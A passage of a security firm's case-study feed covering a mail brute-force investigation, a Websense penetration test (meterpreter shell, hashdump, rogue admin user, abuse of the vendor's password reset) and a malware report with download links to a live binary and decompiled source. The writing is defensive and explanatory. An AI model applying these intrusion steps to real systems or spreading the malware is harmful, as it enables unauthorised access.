<content:encoded><![CDATA[<p style="text-align: justify;">Torrid Networks was recently engaged by a large software company to investigate rising spam issues with its corporate mail server. The company had over 2500 mailboxes protected by a software-based anti-spam solution. The same solution had been running for quite a while without any trouble, yet spam levels had soared recently. Moreover, the spam reaching user inboxes did not consist of spam emails as such; it consisted of bounce messages with the mailbox owner as sender and some unknown email address as recipient, to which the owner had never sent any email. The customer suspected a serious breach of its mail server or a virus outbreak in the network and wanted an expert information security team to investigate.</p>
<h3>The Problem</h3>
<p style="text-align: justify;">Torrid Networks started with routine SMTP tests to check whether the server was an open relay, lacked spoofing protection or had SMTP vulnerabilities. Everything was in place and the server was configured neatly. The next step was to check the effectiveness of the anti-spam solution, which was tested by submitting recent spam samples; all of them were caught by the anti-spam engine. We quickly concluded that there were no configuration issues with either the Mail Transport Agent (MTA) or the underlying spam engine.</p>
<p style="text-align: justify;">Naturally, the investigation moved on to log analysis of the mail server, and the problem was caught within a few minutes. Emails were being sent to external users through authenticated mail accounts from outside IP addresses. This clearly indicated that email passwords had been compromised and were being used to launch spam from the customer’s email server. Our team checked with the customer on the compromised accounts, and the customer confirmed that newly created mailboxes carried a default password. Moreover, the email server was based on an open source solution with no mechanism to expire passwords or to enforce complex ones. As a first step, the customer was advised to change the passwords of all users whose accounts were being abused by the spammers.</p>
<p style="text-align: justify;">The problem deepened when the investigation team found the pattern repeating: another set of mailboxes was abused in the same way as before. The logs were picked up once again to drill down to the root cause, and the second round of analysis held no surprise: it was a brute force attack against the mail server to guess credentials and send bulk email after each successful compromise.</p>
<h3 style="text-align: justify;">The Solution</h3>
<p style="text-align: justify;">It was time to work on brute force protection for the mailboxes on the server using the limited resources available to the customer. The mail server software in use was Postfix, which by default logs every successful and failed login attempt to /var/log/maillog on the Linux server. Analysis showed that the brute force attack was coming from distributed IP addresses and IP ranges, so it was hard to identify which IP address or range to block. Fail2ban, a free and open source tool, was identified to protect the server from brute force attacks. It scans the log files for failed attempts using its built-in set of regular expressions and creates a TCP Wrapper or iptables rule to block the source IP address. Fail2ban rules were enabled to block IP addresses brute forcing email or SSH passwords, with a threshold of 2 failed attempts and a ban time of 10 hours.</p>
<p style="text-align: justify;">Within a couple of hours there was a long list of blocked IP addresses, and everything looked perfect, with spam reduced to almost zero. However, the server was kept under close observation. After a day or so, the investigation team realized that the attack was a targeted one and that the attackers were changing their strategy to counter every protection our team suggested to the customer. The third round of investigation revealed that the spammers were now making only a single attempt from each IP address, bypassing the fail2ban rule that blocks an IP after 2 failed attempts, and that the IP addresses were changing far more rapidly than in the previous round. We could not suggest blocking an IP after a single attempt because even legitimate users could get blocked that way, leading to Denial of Service (DoS).</p>
<p style="text-align: justify;">We started looking for patterns in the IP addresses, something we had initially skipped by relying on fail2ban alone, to get a clue on how to proceed. The team analyzed nearly 100 IP addresses from which the brute force was being attempted, and all of them turned out to be Chinese IP addresses. The customer was using a Cisco firewall, but its management was outsourced to an external party, and the customer wanted us to derive a solution on the server itself rather than coordinate with the firewall management team to block Chinese IP addresses.</p>
<p style="text-align: justify;">Torrid Networks’ team quickly gathered Chinese IP address ranges from public but authentic sources and prepared a list for iptables rules. Spam came to a halt with the combination of denying all the Chinese ranges and the fail2ban rules. The customer was also advised to update the mailing solution to the latest version in order to enforce password policies.</p>
<p style="text-align: justify;"><a href="http://www.torridnetworks.com/wp-content/uploads/2012/03/Chinese-Korean_IPs.txt" target="_blank">Click here</a> to download the list of Chinese IP ranges used.</p>
]]></content:encoded>
			</item>
		<item>
		<title>Penetration Testing of Websense Content Filtering for Gurgaon, Delhi NCR, India based company</title>
		<link>https://www.torridnetworks.com/resources/case-studies/penetration-testing-of-websense-content-filtering-for-gurgaon-delhi-ncr-india-based-company</link>
		<comments>https://www.torridnetworks.com/resources/case-studies/penetration-testing-of-websense-content-filtering-for-gurgaon-delhi-ncr-india-based-company#comments</comments>
		<pubDate>Wed, 28 Jan 2015 02:48:47 +0000</pubDate>
		<dc:creator><![CDATA[torridadmin]]></dc:creator>
				<category><![CDATA[Case Studies]]></category>

		<guid isPermaLink="false">http://www.torridnetworks.com/?p=573</guid>
<description><![CDATA[<p>Torrid Networks was recently engaged by a Gurgaon, Delhi NCR, India based company to conduct comprehensive penetration testing of its content filtering infrastructure. The customer uses the Websense content filtering product to prevent non-business and malicious internet traffic from being accessed at end-user workstations. The objective of this assignment was to obtain assurance&#8230;</p>
]]></description>
<content:encoded><![CDATA[<p style="text-align: justify;">Torrid Networks was recently engaged by a Gurgaon, Delhi NCR, India based company to conduct comprehensive penetration testing of its content filtering infrastructure. The customer uses the Websense content filtering product to prevent non-business and malicious internet traffic from being accessed at end-user workstations. The objective of this assignment was to obtain assurance on the security posture of the company&#8217;s content filtering infrastructure.</p>
<h3>Penetration Testing</h3>
<p style="text-align: justify;">Our penetration testing team requested LAN access from the customer so that the content filtering infrastructure could be checked from inside the LAN. On visiting one unauthorized website, our team could easily trace the IP address of the running Websense instance. Websense was installed on a Windows 2003 server, with SQL Server installed on the same machine to store the web access logs. During the penetration testing we found a critical remote code execution vulnerability in the Windows server, which led to a server compromise and returned a meterpreter shell. We used the latest BackTrack distribution with the Metasploit framework to exploit the vulnerability.</p>
<p style="text-align: justify;"><a href="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration1.png"><img class="aligncenter" src="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration1.png" alt="" width="250" height="150" /></a>After getting the meterpreter shell, we were able to perform various tasks such as creating and deleting directories and users, taking a hashdump, and so on. We created a local user with administrator privileges to obtain a remote desktop session so that copying data to or from the Websense server would be easy. Our penetration testing goal was to compromise the Websense content filtering system, gain access to the content filtering policies and modify them, but the server compromise did not get us into the Websense management console, since the console&#8217;s authentication credentials were picked from a centralized authentication repository, i.e. Active Directory.</p>
<h3>Compromising Websense Management Console</h3>
<p style="text-align: justify;">Logging into the management console appeared to be a challenging task at first sight. From the RDP session, we identified the installation path of Websense and located the Websense configuration file to identify the URL of the management console. Our team tried brute forcing the management console, which did not work for us. The default username for the Websense administrator account is &#8220;websenseadministrator&#8221;. The only option left to us was to reset the &#8220;websenseadministrator&#8221; password.</p>
<p style="text-align: justify;">To reset the password, we were required to have a registered account at <a href="http://www.websense.com">www.websense.com</a> with a valid subscription key for the product. It was easy to grab the subscription key from the Websense configuration file. However, we did not have a registered account at <a href="http://www.websense.com">www.websense.com</a>.</p>
<p style="text-align: justify;"><a href="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration21.png"><img class="aligncenter" src="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration21.png" alt="" width="400" height="215" /></a>We did not have an email account on the same domain as our customer&#8217;s, so we assumed that a new account would not be accepted by the Websense team. Even so, we proceeded to register an account at <a href="http://www.websense.com">www.websense.com</a> using our own domain name, i.e. @torridnetworks.com, along with other legitimate information. After registration, we received the email below from Websense with our login details. We logged into the Websense portal but could not generate the password reset key for the &#8220;websenseadministrator&#8221; account, since we were not yet authorized by Websense to do so.</p>
<p style="text-align: center;"><a href="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration31.png"><img class="aligncenter" src="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration31.png" alt="" width="400" height="250" /></a></p>
<p style="text-align: justify;">After a few hours, to our surprise, we received a confirmation email from Websense with instructions to reset the password.</p>
<p style="text-align: justify;"><a href="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration41.png"><img class="aligncenter" src="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration41.png" alt="" width="400" height="250" /></a>We logged into the websense.com portal with the newly created username and password and gained access to the customer&#8217;s product. We could also escalate our privileges to super admin, as shown in the image below. This was possible because we were the first user to claim the &#8220;Super Admin&#8221; role:</p>
<p style="text-align: center;"><a href="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration5.png"><img class="aligncenter" title="Penetration Testing Consultants" src="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration5.png" alt="Penetration Testing" width="400" height="250" /></a></p>
<p style="text-align: justify;">We followed the reset password instruction page, where further instructions required us to copy the generated key, put the key into the resetPassword.txt file in the bin folder of the Websense installation, and then reset the WebSenseAdministrator password using WsPwdReset.exe.</p>
<p style="text-align: center;"><a href="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration61.png"><img class="aligncenter" src="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration61.png" alt="" width="400" height="250" /></a></p>
<p style="text-align: justify;"><a href="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration71.png"><img class="aligncenter" src="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration71.png" alt="" width="400" height="200" /></a>We followed the said instructions and had admin access to the Websense management console.</p>
<p style="text-align: center;"><a href="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration8.png"><img class="aligncenter" src="http://www.torridnetworks.com/wp-content/uploads/2011/03/012811_0948_Penetration8.png" alt="" width="400" height="200" /></a></p>
<h3>The Results</h3>
<p style="text-align: justify;">Our penetration testing results confirmed that compromising Websense content filtering required only operating system access. Websense has established an additional security control by allowing the administrator&#8217;s password to be reset from its portal, but it does not add any value. The problem lies in the Websense security process: the Websense team does not vet the created account and approves anyone who holds a valid subscription key. The subscription key is not particularly private information, since during procurement of the product it travels from the OEM through the distributor and reseller to the end customer.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.torridnetworks.com/resources/case-studies/penetration-testing-of-websense-content-filtering-for-gurgaon-delhi-ncr-india-based-company/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Malware Analysis Report for a targeted attack via word document carried out against few sensitive email accounts belonging to elite customer of Torrid</title>
		<link>https://www.torridnetworks.com/resources/case-studies/malware-analysis-report-for-a-targeted-attack-via-word-document-carried-out-against-few-sensitive-email-accounts-belonging-to-elite-customer-of-torrid</link>
		<comments>https://www.torridnetworks.com/resources/case-studies/malware-analysis-report-for-a-targeted-attack-via-word-document-carried-out-against-few-sensitive-email-accounts-belonging-to-elite-customer-of-torrid#respond</comments>
		<pubDate>Sun, 18 Apr 2010 11:20:02 +0000</pubDate>
		<dc:creator><![CDATA[torridadmin]]></dc:creator>
				<category><![CDATA[Case Studies]]></category>
		<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[Malware Reverse Engineering]]></category>

		<guid isPermaLink="false">http://torridnetworks.com/site/?p=224</guid>
<description><![CDATA[<p>The customer is from the government sector and is responsible for carrying out a few sensitive tasks, which makes it an obvious and prime target for cyber attacks. Recently, a few prominent email accounts belonging to the customer received a suspicious email with a Word attachment, sent from an already compromised account within the organization. Torrid was asked to analyze the Word&#8230;</p>
]]></description>
				<content:encoded><![CDATA[<div style="text-align: justify;">
<p>The customer is from the government sector and is responsible for carrying out a few sensitive tasks, which makes it an obvious and prime target for cyber attacks. Recently, a few prominent email accounts belonging to the customer received a suspicious email with a Word attachment, sent from an already compromised account within the organization. Torrid was asked to analyze the Word document, deduce the impact of this attack, trace its origin and provide a remedy.</p>
<p>In the first step of the analysis, it was observed that the Word document carries a malware payload and exploits an existing vulnerability in Microsoft Word. The malware executable was packed using NsPack and went undetected by a number of antivirus products. After thorough dynamic and static analysis, a detailed report was submitted to the customer to help them understand the impact of the attack along with the remedy for it. Below is the detailed report along with the malware payload and the decompiled binaries in C and assembly language.</p>
</div>
<p><iframe src="https://www.slideshare.net/slideshow/embed_code/key/ERBbyAG2fHQzba" width="479" height="511" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe>
<div style="margin-bottom:5px"> <strong> <a href="https://www.slideshare.net/torridnetworks/malware-analysis-report-2838927" title="Malware Analysis Report" target="_blank">Malware Analysis Report</a> </strong> from <strong><a href="http://www.slideshare.net/torridnetworks" target="_blank">Torrid Networks Private Limited</a></strong> </div>
<div style="text-align: justify;">
<p><strong>Note:</strong> The malware binaries have been compressed with the password &#8220;malware&#8221; (without quotes). Execute them ONLY on a virtual machine or lab PC, as your machine will be compromised if you execute the binary directly on it.</p>
</div>
<ul>
<li><a href="http://www.torridnetworks.com/Malware/Malware_5Jan2009.rar">Download Malware Binary</a></li>
<li><a href="http://www.torridnetworks.com/Malware/Malware_Source_Files_in_ASM_C_5Jan2009.zip">Download Malware decompiled source code in C and assembly language</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>https://www.torridnetworks.com/resources/case-studies/malware-analysis-report-for-a-targeted-attack-via-word-document-carried-out-against-few-sensitive-email-accounts-belonging-to-elite-customer-of-torrid/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Information Security Audit For A BPO And Knowledge Management Company</title>
		<link>https://www.torridnetworks.com/resources/case-studies/information-security-audit-for-a-bpo-and-knowledge-management-company</link>
		<comments>https://www.torridnetworks.com/resources/case-studies/information-security-audit-for-a-bpo-and-knowledge-management-company#respond</comments>
		<pubDate>Wed, 11 Nov 2009 22:18:20 +0000</pubDate>
		<dc:creator><![CDATA[torridadmin]]></dc:creator>
				<category><![CDATA[Case Studies]]></category>
		<category><![CDATA[information security audit]]></category>
		<category><![CDATA[ISO 27001]]></category>
		<category><![CDATA[IT Security Services]]></category>
		<category><![CDATA[Vulnerability Management]]></category>

		<guid isPermaLink="false">http://torridnetworks.com/site/?p=222</guid>
<description><![CDATA[<p>The customer offers Information Technology, BPO and Knowledge services to its various clients. Several blue-chip organizations have chosen them as a strategic partner to manage key result-oriented areas of Information Technology, due to their strong capabilities across industry verticals, technical strengths and innovative &#38; flexible service delivery models. Their global delivery model revolves&#8230;</p>
]]></description>
<content:encoded><![CDATA[<p style="text-align: justify;">The customer offers Information Technology, BPO and Knowledge services to its various clients. Several blue-chip organizations have chosen them as a strategic partner to manage key result-oriented areas of Information Technology, due to their strong capabilities across industry verticals, technical strengths and innovative &amp; flexible service delivery models.</p>
<p style="text-align: justify;">Their global delivery model revolves around developing a sustainable competitive advantage for their client through Information Technology services across application development, deployment, maintenance and re-engineering, content &amp; publishing services &amp; outsourcing solutions.</p>
<h3 style="text-align: justify;">The Challenge</h3>
<p style="text-align: justify;">Information stored on the servers is critical to the operation and perhaps even the survival of our client. To protect their information assets and give confidence to all their stakeholders, especially their customers, they wanted to go for ISO/IEC 27001 certification. The certification is the auditable international standard which defines the requirements for an Information Security Management System (ISMS). The standard is designed to ensure the selection of adequate and proportionate security controls.</p>
<p style="text-align: justify;">Keeping in view the importance of the IT infrastructure to their operations, the client opted for a proactive audit and assessment of their network before the ISO/IEC 27001 certification. Torrid was asked to audit their branch offices to review the vulnerabilities in infrastructure components such as operating systems (Windows Server 2003, Sun Solaris and Linux), firewalls, routers and switches.</p>
<h3 style="text-align: justify;">The Solution</h3>
<p style="text-align: justify;">Torrid’s threat research team performed a vulnerability assessment against all internally and externally accessible network infrastructure. The vulnerability assessment began with identification of all targeted hosts within the given network ranges, along with fingerprinting of all the services running. Our team identified a number of process failures related to patch management and misconfigurations. Most of the Windows and Solaris machines were found to be unpatched and highly vulnerable. By exploiting these vulnerabilities an attacker could execute arbitrary code on the remote host and gain access to sensitive information.</p>
<p style="text-align: justify;">Further, our team was able to exploit trust relationships within the DMZ, which hosted the database server and a system management client. Since default and weak passwords were in use on the homepage, this was not a tough job. It allowed the consultants to obtain administrator access to a remote system management server belonging to the client. Through this vulnerability an attacker could gain access to the organization’s main corporate domain and a number of file servers holding compliance-related data within minutes. Once the thorough assessment was completed, a detailed report was provided to the client, including all the findings and their proper remediation.</p>
<h3 style="text-align: justify;">The Result</h3>
<p style="text-align: justify;">Our team successfully demonstrated that the unauthorized access provided by a single poorly configured system on the Internet could give a malicious and motivated attacker full access to a vast number of corporate systems and the sensitive data stored in them from within the organization. The findings allowed our client to rectify issues in their critical servers and successfully clear the ISO/IEC 27001 certification.</p>
<p style="text-align: justify;">As a result of the security assessment by Torrid, the client now has the peace of mind that comes from expert, third-party validation of its security policies. Its customers also trust the results of the assessment and are investing further in leveraging the client’s solution.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.torridnetworks.com/resources/case-studies/information-security-audit-for-a-bpo-and-knowledge-management-company/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Application Security Assessment For A Global Financial Services Company</title>
		<link>https://www.torridnetworks.com/resources/case-studies/application-security-assessment-for-a-global-financial-services-company</link>
		<comments>https://www.torridnetworks.com/resources/case-studies/application-security-assessment-for-a-global-financial-services-company#respond</comments>
		<pubDate>Mon, 09 Mar 2009 22:17:11 +0000</pubDate>
		<dc:creator><![CDATA[torridadmin]]></dc:creator>
				<category><![CDATA[Case Studies]]></category>
		<category><![CDATA[Black Box Testing]]></category>
		<category><![CDATA[Web Application Security]]></category>

		<guid isPermaLink="false">http://torridnetworks.com/site/?p=220</guid>
<description><![CDATA[<p>The customer is a global financial services company headquartered in New York City, best known for its credit card, charge card and traveler&#8217;s cheque businesses. Following an era of international expansion, the company became an entity. It is one of the global payments companies today. Their global delivery model revolves around developing a sustainable&#8230;</p>
]]></description>
				<content:encoded><![CDATA[<div style="text-align: justify;">
<p>The customer is a global financial services company headquartered in New York City, best known for its credit card, charge card and traveler&#8217;s cheque businesses. Following an era of international expansion, the company became an entity. It is one of the global payments companies today.</p>
<p>Their global delivery model revolves around developing a sustainable competitive advantage for their clients through a centralized repository, a client web-based database management system, which involves migration of various profiles from all the major Global Distribution Systems (GDS), Online Booking Tools (OBT) and other external systems.</p>
</div>
<h3 style="text-align: justify;">The Challenge</h3>
<p style="text-align: justify;">Their model allows third-party applications to access data via a published interface. The application is capable of sending the desired data to the GDS (Global Distribution System) using Windows services. The application supports both SQL Server and Oracle databases. The migration of data is a very critical process, as some modules are integrated by third parties and various parts of the application undergo routine revisions. The customer was concerned about the protection of the web-based application along with the two-tier thick client application, and about protecting its critical database repository against critical vulnerabilities and the corresponding risks.</p>
<h3 style="text-align: justify;">The Solution</h3>
<div style="text-align: justify;">
<p>The customer planned to obtain Information Security Services from Torrid Networks Pvt Ltd, which included a thorough application security assessment. The steps carried out for the in-depth analysis of the application and the security assessment were:</p>
</div>
<ol style="text-align: justify;">
<li>
<div>
<p>Interaction with the development team is done to understand business requirements for the application, target customers, confidential assets and data flow of the application.</p>
</div>
</li>
<li>
<div>
<p>Objectives are defined to perform a through security assessment of web based application and thick client application.</p>
</div>
</li>
<li>
<div>
<p>Performed a web application audit and assess their application from an attacker’s perspective.</p>
</div>
</li>
<li>
<div>Our team executes various attacks against the application using commercial, open source and custom tools to determine underlying vulnerabilities in the application.</div>
</li>
<li>
<div>Manual verification and risk analysis of the findings.</div>
</li>
<li>
<div>Manual assessment of components not covered by the automated scanner, as well as any complex attack scenarios.</div>
</li>
<li>
<div>Ensuring that all the roles and privilege levels were not escalated.</div>
</li>
<li>
<div>Ensuring the proper use of cryptography for data at rest and in transit.</div>
</li>
<li>
<div>Comprehensive logging and auditability of user actions.</div>
</li>
<li>
<div>Validating user input for malicious data that could result in loss of integrity or confidentiality of data.</div>
</li>
<li>
<div>Methodology for security assessment includes, but not limited to, all the checks for the security issues identified by OWASP TOP 10 list and critical major vulnerabilities in thick client applications including unvalidated input, weak authentication method, sensitive data in memory, critical data in files &amp; registry and impersonating a high privilege user.</div>
</li>
<li>
<div>Finally, a multi-faceted, multi-pronged report with step-by-step guidance on security best practices was handed over to them, written with its audience, generally the development team and managers, in mind.</div>
</li>
</ol>
<h3 style="text-align: justify;">The Result</h3>
<div style="text-align: justify;">The assessment revealed numerous holes in the application&#8217;s security controls. We highlighted the significant risks and the steps to mitigate them, which helped the development team address remediation; this enabled protection for a high volume of users, multiple web-based and thick client applications and databases, resulting in a highly secured application. Torrid and this financial services organization remain trusted solution partners in the delivery of annual information security assessments.
</div>
<p>The post <a rel="nofollow" href="https://www.torridnetworks.com/resources/case-studies/application-security-assessment-for-a-global-financial-services-company">Application Security Assessment For A Global Financial Services Company</a> appeared first on <a rel="nofollow" href="https://www.torridnetworks.com/home">Torrid Networks</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.torridnetworks.com/resources/case-studies/application-security-assessment-for-a-global-financial-services-company/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Implementation of CA eTrust Access Control For Government of India</title>
		<link>https://www.torridnetworks.com/resources/case-studies/implementation-of-ca-etrust-access-control-for-government-of-india</link>
		<comments>https://www.torridnetworks.com/resources/case-studies/implementation-of-ca-etrust-access-control-for-government-of-india#respond</comments>
		<pubDate>Sat, 25 Oct 2008 22:15:29 +0000</pubDate>
		<dc:creator><![CDATA[torridadmin]]></dc:creator>
				<category><![CDATA[Case Studies]]></category>
		<category><![CDATA[IT Security Services]]></category>
		<category><![CDATA[Security Product Implementation]]></category>

		<guid isPermaLink="false">http://torridnetworks.com/site/?p=217</guid>
<description><![CDATA[<p>The customer is a prime department under the Government of India and processes highly sensitive financial information across its datacenters distributed at different locations in India. The department is mainly responsible for matters relating to the levy and collection of Direct and Indirect funds. The Challenge The sheer size and type of the organization made it most vulnerable&#8230;</p>
<p>The post <a rel="nofollow" href="https://www.torridnetworks.com/resources/case-studies/implementation-of-ca-etrust-access-control-for-government-of-india">Implementation of CA eTrust Access Control For Government of India</a> appeared first on <a rel="nofollow" href="https://www.torridnetworks.com/home">Torrid Networks</a>.</p>
]]></description>
<content:encoded><![CDATA[<p style="text-align: justify;">The customer is a prime department under the Government of India and processes highly sensitive financial information across its datacenters distributed at different locations in India. The department is mainly responsible for matters relating to the levy and collection of Direct and Indirect funds.</p>
<h3 style="text-align: justify;">The Challenge</h3>
<p style="text-align: justify;">The sheer size and type of the organization made it highly vulnerable to security breaches. There was a need for a high level of availability, performance density, memory scalability and investment protection, so they implemented HP Superdome servers running the HP-UX 11i operating system at multiple data centers distributed over different locations in India.</p>
<p style="text-align: justify;">The major challenges faced in the server infrastructure are described below:</p>
<ol style="text-align: justify;">
<li>Role-Based Access Control and Superuser Containment: Superuser accounts were often shared by application operators, leading to ambiguous accountability. There was no available method to restrict or delegate operator access based on who would use it. It was also difficult to control availability to different users based on time, network attributes, access methods and so on.</li>
<li>No centralized enforcement administration: Major platform security differences existed, together with a lack of remote policy administration, which led to a highly decentralized system. Decentralization meant a lack of manageability, which was a big problem for the management.</li>
<li>Unrestricted superuser: Superuser accounts, which have unlimited access and authority, were unrestricted, making a breach a cake walk for hackers. Imagine one of the bad guys in your backyard having access to your assets.</li>
<li>Inadequate auditing: Native auditing procedures were inadequate, with very low granularity in the operating system. Audit logs were accessible to superusers for tampering, and auditing processes could be shut down at any time. With no self-protecting mechanism against attacks and pilferage, native logs could not keep track of the original login, so the culprit could escape easily.</li>
<li>Consistent Cross-Platform Problems: Different platforms have different security models, so different strategies were needed to handle the difficulties of managing the various security systems, which in turn also increased management costs.</li>
</ol>
<p style="text-align: justify;">Torrid understood the challenges faced by the customer and proposed CA eTrust Access Control (AC) software that could easily mitigate the risk of these threats. eTrust AC provides the capability to manage centralized access control on different servers through a policy enforcement mechanism, along with many other security features.</p>
<p style="text-align: justify;">As the servers were running highly critical government applications, it was not possible to put the policies into enforced mode from day one, so initially all policies were planned to run in warning mode. It was a challenge in itself to provide accurate completion timelines for the project, given the close monitoring of the critical applications and other components required before enforcing the policies.</p>
<h3 style="text-align: justify;">The Solution</h3>
<p style="text-align: justify;">Torrid deployed CA’s eTrust Access Control to counter the above challenges faced by the customer. Our security experts interacted with the client’s team to understand the basic design of the architecture, target customers, end users and confidential assets in order to design the eTrust Access Control framework and its Policy Model Database (PMDB), which is used to distribute policies from the servers to the clients.</p>
<p style="text-align: justify;">There were a total of 12 Superdome servers hosting a pool of 68 virtualized servers distributed over 4 locations in India. The pool further comprised development, pre-production and production servers. It was a huge pool, so starting with the best and right framework was undoubtedly an essential prerequisite.</p>
<p style="text-align: justify;">The following steps were taken to implement the solution in the architecture:</p>
<ol style="text-align: justify;">
<li>Installation of the eTrust Access Control server on a dedicated machine.</li>
<li>As per requirements, a master PMDB and its sub-group PMDBs were installed on the eTrust Access Control server.</li>
<li>Baseline security policies were discussed with their team and enforced on the master PMDB, as these policies should apply to each and every host; thereafter, policies on the different sub-group PMDBs were discussed and enforced. As there were very critical production servers, all policies were put in warning mode.</li>
<li>After designing the eTrust Access Control architecture, the eTrust Access Control client was installed and customized on each server and subscribed to its respective PMDB.</li>
<li>Warnings on all the servers were monitored regularly for some time and discussed with their team, after which the policies were put in restrictive mode.</li>
</ol>
<h3 style="text-align: justify;">The Results</h3>
<p style="text-align: justify;">After analyzing the challenges, Torrid’s technical expertise helped in executing the project, and the implementation was rolled out successfully in the first phase itself without a second iteration. All documentation was handed over to the client, and further assistance was readily available for support and issue resolution. The client reaped the following benefits from the solution implementation:</p>
<ol style="text-align: justify;">
<li><strong>Role-Based Access Control and Superuser Containment: </strong>By using the solution, superuser privileges were fully contained and delegated. There was no back door to bypass checks and gain full control of the system or unauthorized access to files and services. In turn, operators no longer needed a superuser account to perform their jobs.</li>
<li><strong>Centralized Enforcement Administration:</strong> The solution delivered a uniform level of security by bringing every host up to the correct level. It provided centralized security control, allowing enterprise-wide management of access enforcement and tracking with the help of the Policy Model Database, which uses a push mechanism to sequentially update subscribers. Administrators could easily create, delete, suspend, revoke and expire user accounts centrally. They could also enforce password rules such as quality, history and change interval.</li>
<li><strong>Data Protection:</strong> The solution helped protect confidential and sensitive data against hacks and thefts through identity-based granular access control for all files via its host-based intrusion prevention feature. This delivered high service uptime and made resources less susceptible to attacks.</li>
<li><strong>Secure Auditing:</strong> The solution offered a very secure, scalable and reliable means to collect and report access information. It provided secure audit logs, generated locally with the possibility of being collected centrally.</li>
<li><strong>Consistent Security Policies: </strong>CA eTrust Access Control provided consistent security policy across all the HP-UX partitions.</li>
</ol>
<p>The post <a rel="nofollow" href="https://www.torridnetworks.com/resources/case-studies/implementation-of-ca-etrust-access-control-for-government-of-india">Implementation of CA eTrust Access Control For Government of India</a> appeared first on <a rel="nofollow" href="https://www.torridnetworks.com/home">Torrid Networks</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.torridnetworks.com/resources/case-studies/implementation-of-ca-etrust-access-control-for-government-of-india/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Code Review and Web Application Security Assessment For a US State Department</title>
		<link>https://www.torridnetworks.com/resources/case-studies/code-review-and-web-application-security-assessment-for-a-us-state-department</link>
		<comments>https://www.torridnetworks.com/resources/case-studies/code-review-and-web-application-security-assessment-for-a-us-state-department#respond</comments>
		<pubDate>Mon, 28 Jul 2008 22:13:30 +0000</pubDate>
		<dc:creator><![CDATA[torridadmin]]></dc:creator>
				<category><![CDATA[Case Studies]]></category>
		<category><![CDATA[Black Box Testing]]></category>
		<category><![CDATA[Security Code Review]]></category>
		<category><![CDATA[Web Application Security]]></category>

		<guid isPermaLink="false">http://torridnetworks.com/site/?p=215</guid>
		<description><![CDATA[<p>Our client manages the country’s basic infrastructure through a complex network and planned to automate the billing process for the services it provides. They invested heavily in an automation system consisting of small, low-power radio transmitters connected to individual systems that send daily data to a network of receivers throughout the city.  In most cases,&#8230;</p>
<p>The post <a rel="nofollow" href="https://www.torridnetworks.com/resources/case-studies/code-review-and-web-application-security-assessment-for-a-us-state-department">Code Review and Web Application Security Assessment For a US State Department</a> appeared first on <a rel="nofollow" href="https://www.torridnetworks.com/home">Torrid Networks</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;">Our client manages the country’s basic infrastructure through a complex network and planned to automate the billing process for the services it provides. They invested heavily in an automation system consisting of small, low-power radio transmitters connected to individual systems that send daily data to a network of receivers throughout the city.  In most cases, the transmitters will be placed where the system remote receptacles are currently located. The receivers will be part of the department’s information technology arm.  The installation of the system will take approximately three years to complete.</p>
<p style="text-align: justify;">The new technology will be able to send accurate data to a computerized billing system up to four times a day and will largely eliminate the need for estimated bills. Since it is an automated system, it also eliminates the need for a system to be installed at customer properties. All system information is available on the portal, which also provides separate views for anonymous users, registered users, administrators and super administrators.</p>
<h3 style="text-align: justify;">The Challenge</h3>
<p style="text-align: justify;">As the portal contains confidential information of about 8,26,000 account holders, there was a need to secure this information from cyber attacks and to ensure that it is available only in accordance with the access policies. Safeguarding the information assets in the application was a top priority, as the application is internet facing.</p>
<p style="text-align: justify;">Our client was determined to protect itself from the kind of major data breaches reported at major government organizations in recent memory. Since various modules were integrated by third parties and many parts of the application underwent routine revisions, the customer was concerned not only about protecting the initial applications, but also about protecting its database against new vulnerabilities that could be introduced over time. The client also wanted to shorten application development cycles while implementing safe coding practices. In addition, they understood that the combination of custom web applications, thousands of users and the integration of different modules would present a significant number of opportunities for insider threats and external attacks. They needed a solution that encompassed all of these needs without burdening their project management.</p>
<h3 style="text-align: justify;">The Solution</h3>
<p style="text-align: justify;">Torrid recommended a manual security code review followed by a comprehensive application security assessment, delivered through the expertise of its Information Security Center of Excellence. Code review, considered the single most effective technique for identifying security flaws, can, when combined with a security assessment, significantly increase the cost effectiveness of an application security verification effort by bundling the two. Integrating security code review into the System Development Life Cycle (SDLC) increases the overall quality of the code developed without significantly adding to the effort.</p>
<p style="text-align: justify;">The following steps were carried out by Torrid’s experts for the in-depth analysis and assessment of the application:</p>
<ol style="text-align: justify;">
<li>Interaction with the development team to understand the application's business requirements, target customers, confidential assets and data flow, so that the assessment could be performed more effectively.</li>
<li>Security code review objectives were defined and a preliminary scan was done with multiple automated tools to catch all the loopholes present.</li>
<li>A manual code review was performed for security issues unique to the application architecture, filling the gaps in the application security framework.</li>
